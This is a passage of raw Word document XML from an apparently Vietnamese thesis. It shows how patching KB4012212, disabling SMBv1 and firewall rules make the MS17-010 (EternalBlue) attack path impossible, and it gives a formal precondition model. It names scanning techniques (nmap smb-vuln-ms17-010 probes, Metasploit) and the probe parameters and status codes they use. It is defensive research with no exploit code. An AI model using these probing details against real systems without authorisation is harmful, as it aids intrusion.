              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>False</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="878" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="650DFD02" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>False</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="878" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="64B02525" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Kết nối thành công (SMBv2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="878" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="548DDA1A" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Tắt SMBv1 bẻ gãy </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                <w:i/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>D</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>; duy trì SMBv2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB6619" w14:paraId="4117A9FF" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="878" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="30240BD5" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>$S_3$</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="878" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="71E6A558" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Chặn Firewall VLAN 20 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                <w:i/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>\to</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> 10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="878" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="38621F4C" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>False</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="878" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="27578A0B" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>False</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="878" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="64577CE5" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>False</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="878" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="0B5F402D" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>False</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="878" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="602DAFCC" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>False</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="878" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="53BE20D1" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>False</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="878" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="3FFDC77F" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Kết nối thành công (SMBv2 thông suốt)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="878" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="05DB1740" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Firewall bẻ gãy </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                <w:i/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>R</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> từ Pentest; nghiệp vụ toàn vẹn</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="43E17ADF" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00DB6619"/>
    <w:p w14:paraId="3C3391AE" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>(Ghi chú 1: Giá trị $E$ và $C$ tại trạng thái $S_0$ phụ thuộc vào việc kiểm soát hiện tượng phân mảnh bộ nhớ kernel pool; xem Mục 2.4.5).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2168A3CB" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">(Ghi chú 2 - Phân biệt góc nhìn quan sát tại trạng thái $S_3$: Bảng 2.2 phản ánh chuỗi tiền điều kiện từ góc độ trạm kiểm thử (Attacker Vantage Point - VLAN 20). Khi Firewall chặn lưu lượng từ VLAN 20, $R = \text{False}$ khiến các giai đoạn tiếp theo $(S, D, V, E, C)$ không thể kích hoạt từ xa. Tuy nhiên, xét về trạng </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>thái nội tại của máy chủ (Server Internal State) trên VLAN 10, dịch vụ `LanmanServer` vẫn đang chạy bình thường trên cổng 445; giao thức SMBv2 vẫn hoạt động ổn định và sẵn sàng phục vụ người dùng hợp lệ từ VLAN 30 ($S_{\text{internal}} = \text{True}, D_{\text{v2}} = \text{True}$)).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46606595" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>2.3.3. Phương pháp luận chứng minh tính bất khả thi của đường tấn công (Proof of Attack Impossibility)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B25DFDD" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Khác biệt cốt lõi giữa tiếp cận thực nghiệm khoa học và khảo sát dạng hộp đen (Black-box) nằm ở khả năng </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>chứng minh bản chất của tính bất khả thi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Trong nghiên cứu hộp đen, người thực hiện chỉ chạy công cụ khai thác (ví dụ Metasploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
      <w:r>
        <w:t>), thấy không mở được session thì kết luận "hệ thống an toàn". Kết luận này hoàn toàn thiếu căn cứ học thuật, bởi sự thất bại của exploit có thể do cấu hình sai payload, sai port, mạng nghẽn, lỗi phân mảnh bộ nhớ ngẫu nhiên hoặc máy chủ bị treo ngầm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770A2036" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Mô hình nghiên cứu chuỗi nhân quả của đề tài giải quyết triệt để hạn chế này bằng cách chứng minh tính bất khả thi thông qua logic suy diễn hình thức kết hợp với đo lường thực nghiệm bạch hộp tại từng tầng công nghệ:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A82AC6E" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Cơ sở logic hình thức của tính bất khả thi:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621DD8B1" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Đường tấn công chỉ có thể dẫn tới kiểm soát hệ thống khi và chỉ khi toàn bộ chuỗi tiền điều kiện đồng thời thỏa mãn:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0EEB3F" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          <w:b/>
          <w:i/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>\text{Attack Feasibility} \iff R \land S \land D \land V \land E \land (C \lor \neg \text{Reverse})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D63ADC6" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Theo quy tắc tuyển - hội logic toán học, một cuộc tấn công được chứng minh là </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>BẤT KHẢ THI (IMPOSSIBLE)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> khi và chỉ khi chứng minh được tồn tại ít nhất một tiền điều kiện </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          <w:i/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>P_i \in \{R, S, D, V, E, C\}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> nhận giá trị xác định bằng </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          <w:i/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>\text{False}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          <w:i/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440E4F42" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          <w:b/>
          <w:i/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>(\exists P_i = 0) \implies \prod_{k} P_k = 0 \implies \text{Attack Path} \equiv \text{Impossible}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74037801" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Năm kỹ thuật đo lường được thiết kế chính là các công cụ kiểm chứng để xác thực giá trị chân lý của từng biến tiền điều kiện </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          <w:i/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>P_i</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tại từng trạng thái phòng thủ cụ thể.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441FC72F" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Cơ chế chứng minh bất khả thi tại từng tầng công nghệ:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122923A1" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40"/>
        <w:ind w:left="432"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Chứng minh bất khả thi ở tầng Nhân hệ điều hành (Kernel Level) tại trạng thái $S_1$:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F488AE3" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40"/>
        <w:ind w:left="432"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Bản chất can thiệp:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Bản vá KB4012212 can thiệp trực tiếp vào mã máy của driver </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>srv.sys</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, bổ sung đoạn mã kiểm tra toán học biên bộ đệm trong hàm </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>SrvOs2FeaListSizeToNt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> [3], [4]. Khi client gửi danh sách thuộc tính mở rộng (FEA), driver xác thực tổng kích thước thực tế và kiểm tra tràn số nguyên. Nếu sai lệch, hàm trả về mã lỗi và hủy bỏ xử lý trước khi thực hiện cấp phát bộ nhớ Non-Paged Pool nhỏ và sao chép bộ đệm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D051788" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40"/>
        <w:ind w:left="432"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Bằng chứng đo lường:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Kỹ thuật 3 (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>smb-vuln-ms17-010.nse</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) gửi bản tin </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>PeekNamedPipe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> với </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>MaxDataCount = 0xFFFF</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Phản hồi trả về đổi từ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>STATUS_INSUFF_SERVER_RESOURCES</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>0xC0000205</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) sang </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>STATUS_ACCESS_DENIED</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>0xC0000022</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>STATUS_INVALID_HANDLE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>0xC0000008</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) [8], [9]. Kỹ thuật 4 độc lập xác nhận </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Host does NOT appear vulnerable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> [5]. Khi chạy Kỹ thuật 5, do driver không sao chép dữ liệu vượt biên, Non-Paged Pool hoàn toàn không bị ghi đè, không có con trỏ hàm nào bị chuyển hướng sang shellcode </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          <w:i/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>\implies V = \text{False} \implies</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Cuộc tấn công bị triệt tiêu từ bản chất logic nhân hệ điều hành.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376499EB" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40"/>
        <w:ind w:left="432"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Chứng minh bất khả thi ở tầng Giao thức (Protocol / Dialect Level) tại trạng thái $S_2$:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29719A39" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40"/>
        <w:ind w:left="432"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Bản chất can thiệp:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Cấu hình Registry </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>SMB1 = 0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> loại bỏ hoàn toàn trình điều phối phương ngữ SMBv1 trong dịch vụ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>LanmanServer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> [7].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06364BFC" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40"/>
        <w:ind w:left="432"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Bằng chứng đo lường:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Kỹ thuật 2 (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>smb-protocols</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) gửi bản tin </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>SMB_COM_NEGOTIATE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> chứa danh sách chuỗi phương ngữ. Gói tin phản hồi từ máy chủ hoàn toàn loại bỏ chuỗi </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>NT LM 0.12</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, chỉ chấp nhận phương ngữ từ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>SMB 2.0.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> trở lên (hoặc ngắt kết nối nếu chỉ gửi SMBv1) [6], [9]. Do Kỹ thuật 3 và Kỹ thuật 5 phụ thuộc vào khung bản tin SMBv1 (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>SMB_COM_TRANSACTION</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> opcode </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>0x25</w:t>
      </w:r>
      <w:r>
